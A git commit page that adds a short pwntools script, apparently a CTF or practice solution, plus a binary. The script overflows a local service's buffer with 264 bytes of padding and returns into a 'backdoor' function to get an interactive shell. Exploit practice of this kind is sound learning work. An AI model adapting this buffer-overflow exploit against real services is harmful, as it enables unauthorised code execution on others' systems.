1second-commit

This commit is contained in:
2024-10-20 11:00:08 +08:00
parent ae53b6da83
commit f9c69cbd47
6 changed files with 66 additions and 0 deletions

12
output/recv_patch/recv.py Normal file
View File

@@ -0,0 +1,12 @@
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
from pwn import *
context.clear(arch='amd64', os='linux', log_level='info')
elf = ELF('./recv')
sh = remote('127.0.0.1', 11007)
sh.sendline(cyclic(264) + p64(elf.sym['backdoor']))
sh.interactive()

BIN
output/recv_patch/recv_src Executable file

Binary file not shown.